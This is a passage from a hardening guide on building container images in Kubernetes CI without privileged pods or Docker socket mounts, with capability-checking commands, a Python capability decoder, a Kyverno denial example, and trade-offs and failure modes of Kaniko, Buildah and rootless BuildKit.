# the -debug variant of the image, which bundles busybox.
kubectl exec kaniko-build -n ci-builds -- \
  cat /proc/self/status | grep Cap
# Expected output (capabilities dropped to minimum):
# CapInh: 0000000000000000
# CapPrm: 0000000000000013 # CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FSETID
# CapEff: 0000000000000013
# CapBnd: 0000000000000013
# CapAmb: 0000000000000000
Decode the hex value to confirm which capabilities are present:
capsh --decode=0000000000000013
# Output: 0x0000000000000013=cap_chown,cap_dac_override,cap_fsetid
Compare with a --privileged container:
# Inside a --privileged container
cat /proc/self/status | grep Cap
# CapPrm: 000001ffffffffff # All capabilities
# CapEff: 000001ffffffffff
The full capability set (0x1ffffffffff) includes CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_NET_ADMIN, CAP_SYS_MODULE, and all others. The Kaniko container has only three, all scoped to filesystem ownership operations needed for correct layer construction.
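When capsh is not available in the image, the mask can be decoded by hand: each capability is one bit, numbered as in the kernel's capability list. CAP_CHOWN, CAP_DAC_OVERRIDE, and CAP_FSETID are bits 0, 1, and 4, so together they give 0x13. The following sketch decodes any mask. The table covers capabilities 0 through 40, which is an assumption about the kernel version in use; bits above that are reported by number.

```python
# Capability names indexed by bit number (0..40).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]


def decode_caps(mask):
    """Return the names of the capabilities whose bits are set in mask."""
    names = []
    bit = 0
    while mask >> bit:
        if (mask >> bit) & 1:
            # Fall back to the bit number for capabilities newer than the table.
            names.append(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"cap_{bit}")
        bit += 1
    return names


if __name__ == "__main__":
    print(decode_caps(0x13))
    print(len(decode_caps(0x1FFFFFFFFFF)))
```

Running this against the CapEff value from /proc/self/status gives the same information as capsh --decode.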
Kyverno Policy Denial
When a CI job attempts to create a --privileged pod in the ci-builds namespace, the API server returns:
Error from server: admission webhook "validate.kyverno.svc-fail" denied the request:
resource Pod/ci-builds/my-dind-build was blocked due to the following policies
block-privileged-builds/block-privileged:
Privileged containers are not permitted. Use Kaniko, Buildah with
BUILDAH_ISOLATION=chroot, or rootless BuildKit for image builds.
See https://systemshardening.com/articles/cicd/docker-in-docker-shared-kernel-risk/
This message should appear in the CI job log and be immediately actionable: the job fails with a policy violation, not a vague permission error.
Verifying No Docker Socket Presence
In a correctly-configured Kaniko or Buildah pod, the Docker socket should not be present:
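# These checks need ls inside the container; for Kaniko that means the
# -debug executor image, since the standard image has no coreutils
kubectl exec -it kaniko-build -n ci-builds -- ls -la /var/run/docker.sock
# ls: /var/run/docker.sock: No such file or directory
kubectl exec -it kaniko-build -n ci-builds -- ls -la /run/docker.sock
# ls: /run/docker.sock: No such file or directory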
If either path exists, a Docker socket mount is present and the configuration is incorrect.
Trade-offs
Kaniko works for the majority of Dockerfiles but has documented feature gaps relative to the Docker daemon build engine. The --mount=type=cache Dockerfile instruction for build caches was not supported until relatively recent versions; --mount=type=tmpfs and --mount=type=bind have had varying support across releases. Kaniko’s snapshot mechanism (comparing file modification timestamps and hashes between layers) can produce incorrect results for builds that modify files without changing their timestamps — a rare but documented issue. Kaniko’s layer cache is stored in a registry rather than on the build node, which means cache hits require a registry round-trip; cold starts are slower than Docker’s local layer cache. Verify Dockerfile compatibility with Kaniko’s documented unsupported features list before migrating production builds.
Buildah with STORAGE_DRIVER=vfs is significantly slower than overlay-based builds because every layer transition requires a full directory copy rather than a copy-on-write operation. For a build with a 500 MB base image and five RUN layers, vfs storage may require 2-3 GB of disk I/O per build where overlay would require a fraction of that. This is acceptable for small images and low-concurrency builds but can cause disk pressure in high-throughput build clusters. If the runner environment supports fuse-overlayfs, use it. If not, monitor disk usage and build duration carefully.
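The arithmetic behind that estimate can be made explicit with a simple model: under vfs every new layer is written as a full copy of the tree so far, while under overlay only the changed files are written. The sketch below is a back-of-the-envelope model under that assumption, with hypothetical function names; it ignores compression, temporary files, and filesystem overhead.

```python
def vfs_usage_mb(base_mb, layer_deltas_mb):
    """Return (MB written for new layers, total MB stored) under the vfs model."""
    written = 0
    stored = base_mb
    current = base_mb
    for delta in layer_deltas_mb:
        current += delta      # tree size after this RUN step
        written += current    # vfs writes a full copy of the tree
        stored += current
    return written, stored


def overlay_usage_mb(base_mb, layer_deltas_mb):
    """Return (MB written for new layers, total MB stored) under the overlay model."""
    written = sum(layer_deltas_mb)  # only the changed files are written
    return written, base_mb + written


if __name__ == "__main__":
    deltas = [20] * 5  # five RUN layers, each adding an assumed 20 MB
    print("vfs:", vfs_usage_mb(500, deltas))
    print("overlay:", overlay_usage_mb(500, deltas))
```

With a 500 MB base and five layers that add nothing, the vfs model already writes 2,500 MB and stores 3,000 MB, which is where a figure in the 2-3 GB range comes from.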
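Rootless BuildKit requires CONFIG_USER_NS=y in the kernel and requires that unprivileged users are permitted to create user namespaces. The kernel.unprivileged_userns_clone sysctl is specific to Debian and Ubuntu kernels, which enable it by default. Other distributions control this differently (for example through user.max_user_namespaces), and some hardened distributions and security profiles disable it. Check before relying on rootless mode in self-hosted environments:
# Debian/Ubuntu kernels only; the file does not exist elsewhere
cat /proc/sys/kernel/unprivileged_userns_clone
# 1 = user namespaces available to unprivileged users
# 0 = user namespaces restricted, so rootless BuildKit will not function
# Any distribution: 0 here means no user namespaces can be created at all
cat /proc/sys/user/max_user_namespaces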
The --oci-worker-no-process-sandbox workaround allows BuildKit to run inside an unprivileged container, but at reduced isolation between build steps and the daemon. This is a deployment-time decision, not a build-time one: the security properties of the build environment change based on whether the flag is set.
All three tools add operational complexity compared to docker build. Build time differences are real. Cache behaviour differs from Docker’s local layer cache. Dockerfile compatibility requires testing. These are accepted costs for eliminating host root access from build infrastructure. The alternative cost — a single compromised build dependency reaching all secrets in your CI cluster — is not bounded.
Failure Modes
Using docker:dind without reading what it requires. The official docker:dind image is designed for running a Docker daemon inside a container. It works correctly only with --privileged. The image’s documentation and Docker Hub page state this. CI configurations that add this image without understanding its requirements end up with --privileged pods, sometimes in namespaces that were not intended to allow it. The failure mode is silent: the build works correctly, --privileged is present, and the security team discovers this six months later during an audit.
Assuming Kaniko is a drop-in Dockerfile replacement without testing. Kaniko implements a large subset of Dockerfile syntax but not all of it. Builds that use RUN --mount=type=cache for Go module or npm package caching, builds that use complex COPY --chmod flags, or builds that rely on specific Docker daemon behaviour for multi-stage builds may fail or produce incorrect results. Always run Kaniko against your actual Dockerfiles in a staging environment before removing --privileged from production build pipelines. Track Kaniko’s open issues — some Docker features are open enhancement requests, not temporary gaps.
Mounting the Docker socket “just for CI” without reviewing all build steps. The phrase “just for CI” implies reduced security impact. The opposite is true: CI pipelines pull dependencies, execute third-party code, and build from external base images. The attack surface is larger than production, not smaller. A team that mounts the Docker socket to allow docker build inside their CI containers has granted every RUN step in every Dockerfile, every npm install script, and every build-time tool with shell access the ability to create privileged containers on the Kubernetes node. The socket mount is not scoped to image building operations — it is a credential to the host daemon, usable for any Docker operation.
Treating the build namespace as a less critical namespace and skipping admission control. Kubernetes namespaces provide no security boundary between pods in different namespaces on the same node. A privileged pod in ci-builds can access resources in production if they share a node. The ci-builds namespace is often treated as infrastructure rather than security domain, and admission controllers are deployed in enforcement mode for production and staging while ci-builds remains in audit mode or has exceptions. The correct configuration is enforcement mode in every namespace, including build namespaces — the blast radius of a build compromise is at minimum all other jobs on the same node, and with node-level access, extends to cluster-wide IAM credentials.
Conflating “rootless container” with “safe for CI builds.” Running the CI job container itself as a non-root user does not prevent --privileged from being dangerous. A container running as UID 1000 with --privileged still has all capabilities and all system calls available. --privileged overrides user namespace restrictions. The security properties that matter are the presence or absence of --privileged and the presence or absence of the Docker socket mount — not the UID the container’s entry process runs as.